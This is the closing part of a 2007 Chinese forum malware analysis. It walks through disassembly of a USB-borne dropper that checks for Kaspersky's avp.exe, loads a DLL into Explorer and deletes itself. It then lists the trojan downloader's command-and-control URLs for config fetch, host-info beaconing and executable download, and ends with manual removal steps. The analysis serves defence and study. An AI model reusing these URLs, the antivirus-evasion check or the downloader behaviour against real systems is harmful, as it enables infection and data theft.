DWORD PTR SS :[
ESP +C]
00401846 |. 50
PUSH EAX ; /hKey
00401847 |. FF15 10204000
CALL DWORD PTR DS :[<&advapi32.RegCloseK>
; \RegCloseKey
0040184D |. E8 AEF7FFFF
CALL UnPack_D.00401000
; 检测是否有 avp.exe
00401852 |. 84C0
TEST AL ,
AL
00401854 |. 74 2E
JE SHORT UnPack_D.00401884
00401856 |. 8B4D 08
MOV ECX ,
DWORD PTR SS :[
EBP +8]
; 有的话,那就
00401859 |. 6A 05
PUSH 5
; /ShowState = SW_SHOW
0040185B |. 6A 00
PUSH 0
; |/lParam = 0
0040185D |. 68 F0134000
PUSH UnPack_D.004013F0
; ||pDlgProc = UnPack_D.004013F0
00401862 |. 6A 00
PUSH 0
; ||hOwner = NULL
00401864 |. 6A 6C
PUSH 6C
; ||pTemplate = 6C
00401866 |. 51
PUSH ECX ; ||hInst
00401867 |. FF15 E0204000
CALL DWORD PTR DS :[<&user32.CreateDialo>
; |\CreateDialogParamA
0040186D |. 50
PUSH EAX ; |hWnd
0040186E |. FF15 E4204000
CALL DWORD PTR DS :[<&user32.ShowWindow>>
; \ShowWindow
00401874 |. E8 F7F7FFFF
CALL UnPack_D.00401070
; 又要利用 sysret.dat 重启电脑
00401879 |. 68 E8030000
PUSH 3E8
; /Timeout = 1000. ms
0040187E |. FF15 2C204000
CALL DWORD PTR DS :[<&kernel32.Sleep>]
; \Sleep
00401884 |> E8 97F9FFFF
CALL UnPack_D.00401220
; 加载 zipext32.dll 到 Explorer
00401889 |. E8 62F8FFFF
CALL UnPack_D.004010F0
; 在临时文件夹里面船舰 7ztmp.bat ,写入删除该程序的批处理,并运行
0040188E |. 5F
POP EDI ; ntdll.7C930738
0040188F |. 5E
POP ESI
00401890 |. 33C0
XOR EAX ,
EAX
00401892 |. 5B
POP EBX
00401893 |. 8BE5
MOV ESP ,
EBP
00401895 |. 5D
POP EBP
00401896 \. C2 1000
RETN 10
======================================================================
00401000 /$ 81EC 28010000
SUB ESP ,128
00401006 |. 56
PUSH ESI
00401007 |. 57
PUSH EDI
00401008 |. 6A 00
PUSH 0
; /ProcessID = 0
0040100A |. 6A 02
PUSH 2
; |Flags = TH32CS_SNAPPROCESS
0040100C |. E8 95080000
CALL <JMP.&kernel32.CreateToolhelp32S>
; \CreateToolhelp32Snapshot
00401011 |. 8BF8
MOV EDI ,
EAX ; 建立系统进程列表句柄
00401013 |. 8D4424 08
LEA EAX ,
DWORD PTR SS :[
ESP +8]
00401017 |. 50
PUSH EAX ; /pProcessentry
00401018 |. 57
PUSH EDI ; |hSnapshot
00401019 |. C74424 10 280>
MOV DWORD PTR SS :[
ESP +10],128
; |
00401021 |. E8 7A080000
CALL <JMP.&kernel32.Process32First>
; \Process32First
00401026 |. 85C0
TEST EAX ,
EAX ; 枚举进程呼?
00401028 |. 74 28
JE SHORT UnPack_D.00401052
0040102A |. 8B35 A4204000
MOV ESI ,
DWORD PTR DS :[<&msvcrt._strcm>
; msvcrt._stricmp
00401030 |> 8D4C24 2C /
LEA ECX ,
DWORD PTR SS :[
ESP +2C]
00401034 |. 68 1C214000 |
PUSH UnPack_D.0040211C
; ASCII "avp.exe"
00401039 |. 51 |
PUSH ECX
0040103A |. FFD6 |
CALL ESI
0040103C |. 83C4 08 |
ADD ESP ,8
0040103F |. 85C0 |
TEST EAX ,
EAX
00401041 |. 74 1A |
JE SHORT UnPack_D.0040105D
00401043 |. 8D5424 08 |
LEA EDX ,
DWORD PTR SS :[
ESP +8]
00401047 |. 52 |
PUSH EDX ; /pProcessentry
00401048 |. 57 |
PUSH EDI ; |hSnapshot
00401049 |. E8 4C080000 |
CALL <JMP.&kernel32.Process32Next>
; \Process32Next
0040104E |. 85C0 |
TEST EAX ,
EAX
00401050 |.^ 75 DE \JNZ SHORT UnPack_D.00401030
00401052 |> 5F
POP EDI ; 慢慢列举吧你·~
00401053 |. 32C0
XOR AL ,
AL
00401055 |. 5E
POP ESI
00401056 |. 81C4 28010000
ADD ESP ,128
0040105C |. C3
RETN
0040105D |> 5F
POP EDI
0040105E |. B0 01
MOV AL ,1
00401060 |. 5E
POP ESI
00401061 |. 81C4 28010000
ADD ESP ,128
00401067 \. C3
RETN
=================================================================================================
第五步:看似木马程序的 ZipExt32.dll
哦?
还是懒得分析~
简单看了一下
这个dll 类似于木马下载者
功能大致:
1.
下载 http://www.black163.com/mm/cfg2.txt 到 C:\z.ini
--从这个名字来看,应该是配置文件
2.
http://www.black163.com/mm/dg1/log.asp?isnew=1&LocalInfo=%s&szHostName=%s&tmp3=tmp3
http://www.black163.com/mm/dg1/log.asp?isnew=0&LocalInfo=%s&szHostName=%s&tmp3=tmp3
LocalInfo=应该是本地信息
zHostName=主机名字?
大致是将本地及其参数发到 网上去
--呵呵,怎么感觉 像是 通过 web 控制的 木马饿~
3.
http://www.black163.com/u319.exe
http://mm.black163.com/u319.exe
想都不想,肯定下载 u319.exe 并运行~
--可能是类似木马升级吧,当然肯定,运行后也会把屁股擦了,删除垃圾文件.
4.
wsctny1.exe
wsctny2.exe
wsctny1.tmp
应该都是 运行的文件名字吧~
最后加一句
卑鄙卑鄙...........
Alexander Roshal
伪装成 Alex签名...
反正不管怎么说,里面有马................
=================================================================================================
第六步:完,分析就到这里了,其实那个 Sys 偶很想去分析的啦。可以不会
=================================================================================================
最后帖手动解决方案:
首先,卸载所有移动存储设备 进入安全模式,所有驱动器用右键鼠标打开:
1.
如果有以下文件请删除
c:\tmp.hiv
C:\sysret.dat
C:\sysret.sys
system32\AceExt32.dll
windows\Downloaded Program Files\Ext32.dat
windows\Downloaded Program Files\Ext32.dll
windows\Downloaded Program Files\ZipExt32.dll
windows\Downloaded Program Files\CxUSBKey.exe
2.
删除注册表
SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
下面 带有 AceExt32.dll 和 ZipExt32.dll 的请删了
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\SM_GameDro
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524150}
HKEY_CLASSES_ROOT\CLSID\{35CEC8A3-2BE6-11D2-8773-92E220524140}
3.
关闭自动运行
开始-》运行-》Gpedit.msc-》计算机配置-》管理模块-》系统-》关闭自动播放-》已启动-》所有驱动器-》确定 OK~
4.
插入移动存储器,鼠标右键打开
删除里面的病毒程序
X:\RECYCLER\UcHelp.exe
X:\RECYCLER\desktop.ini
X:\autorun.inf
重启电脑应该就没有事了!
BTW:
当然你不愿意进安全模式,那么强行卸载Explorer 中那两个 刀 AceExt32.dll,ZipExt32.dll,
再去删除那些文件,清理那些注册表也是可以的。
--------------------------------------------------------------------------------
【经验总结】
1. 第一次分析病毒程序,感觉怕怕,为此我还装了影子系统
2. 感谢 恶灵骑士 MJ0011 介绍 sysret.sys 的工作机理
3. 感谢 xyzreg 大虾提供的强奸注册表 Pass HIPS-RD 方法
4. 好了,我可以去吐血了~
--------------------------------------------------------------------------------
【版权声明】: 本文原创于看雪技术论坛, 转载请注明作者并保持文章的完整, 谢谢!
2007年06月03日 上午 10:20:04
[培训]内核驱动高级班,冲击BAT一流互联网大厂工作,每周日13:00-18:00直播授课
上传的附件: